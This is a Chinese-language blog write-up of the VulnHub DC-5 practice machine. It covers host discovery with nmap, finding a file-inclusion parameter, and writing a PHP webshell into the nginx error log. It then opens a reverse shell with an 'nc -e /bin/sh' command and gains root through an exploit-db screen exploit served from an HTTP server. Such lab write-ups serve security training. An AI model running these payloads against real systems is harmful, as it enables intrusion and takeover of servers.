vulnhub之dc5

这个靶场延续了dc系列一贯直白的套路,直接提升权限,实际操作中还是存在着一些未能解决的问题,话不多说,直接干
官方wp地址

https://blog.mzfr.me/vulnhub-writeups/2019-07-09-DC5

主机发现

nmap -sS 192.168.43.0/24

这里介绍一下 ip地址之后的24,代表24个字节,A段,B段,C段各占8个字节,也就是每一个段共有256个数字,检测B段的话,0/16,检测A段的0/8
在这里插入图片描述目标为139,本机IP为128,进行端口检测

在这里插入图片描述
不知道为什么,我这边多个了45530端口,有可能是因为我做完的缘故,但是不影响,共有三个端口80为http服务,111为rpcbind服务,45530不晓得是哪个服务
谷歌大法中,存在几个关于rpcbind服务相关漏洞但是均为ddos攻击,对获得权限并无帮助,只能够从80端口入手
在这里插入图片描述80端口为http服务
在这里插入图片描述进行指纹识别,并未识别到相应指纹在这里插入图片描述进行路径爬取,个人喜欢使用rad和dirb,一个进行路径爬取,一个进行暴力破解
在这里插入图片描述切记,运行rad,不能够使用root权限进行执行,
在这里插入图片描述到这里,应该就会产生一个疑问,php文件为什么后面还可以跟php,这就涉及到文件包含,但是我们还应该寻找一个存在文件包含关系的地方,这种只涉及几个界面的,我们可以一个一个去尝试,按照第一个链接进行尝试,直接在后面拼接/inde.php和/admin.php看哪一个界面返回的内容不一样
就像首页一样,http://192.168.43.139/index.php/index.php实际上是和http://192.168.43.139/index.php/admin.php的界面返回内容一样,经过尝试,只有thankyou.php这个界面的范湖内容不一样,表现为copyright后面的数值不同,猜测这个界面存在文件包含,动用burpsuit爆破参数,爆破出来参数为file
在这里插入图片描述分享一个fuzz字典,包括路径,主域名,参数等,需要的自己下载

https://github.com/gh0stkey/Web-Fuzzing-Box

尝试进行文件包含,获得了文件参数,尝试进行利用,使用这个fuzz下的文件包含字典,

在这里插入图片描述有一个问题,就是不晓得为啥…/etc/passwd和/etc/passwd返回的效果一样
如果返回的字符为乱码的话,在下图位置,更换几种字体即可在这里插入图片描述然后使用文件包含写木马,直接利用官方出具的方案进行利用,

?file=<?php system($_GET["cmd"]) ?>

写入一句话木马,然后在nginx日志进行利用
在这个php环境中,文件包含可以使其他文件以php进行执行,nginx日志则会记录用户的输入记录,包括地址之类的,将一句话木马写入日志中,再通过文件包含日志,日志中的一句话木马就可以以php进行执行

?file=/var/log/nginx/error.log&cmd=ls

使用该命令获取返回值
在这里插入图片描述仔细看由于响应包数据很长,直接拉到最下面查看即可,进行反弹shell操作,直接在cmd出输入自己的命令即可,这里使用nc进行反弹

/thankyou.php?file=/var/log/nginx/error.log&cmd=nc -e /bin/sh IP 端口

查找是否存在python
在这里插入图片描述

使用python产生交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查找可以以root权限运行的组件
我用的是这条命令,还有很多,这里不进行列举

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述再次使用谷歌大法
在这里插入图片描述这两个实际上是一样的,我使用的是,点击下载即可

https://www.exploit-db.com/exploits/41154

按照描述分成三份,那个EOF代表文件结束,不用理会,具体分割见下图
在这里插入图片描述这里又是一个问题,按照正常思维需要上传到靶机上进行编译,但是个人测试,他会爆下图中的错误

在这里插入图片描述然后我又仔细看看了官方给的文档,不难看出,是在自己主机上进行编译,然后上传,进行利用
在这里插入图片描述这里的报错不用理会,会生成新的lihax.so和rootshell两个文件,使用python开启http服务

python3 -m http.server 8008 

在靶机的tmp目录,下载执行即可
在这里插入图片描述注意这里只需要运行最后的exp.c即可

准确来说,这个文件包含解释的有些牵强

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值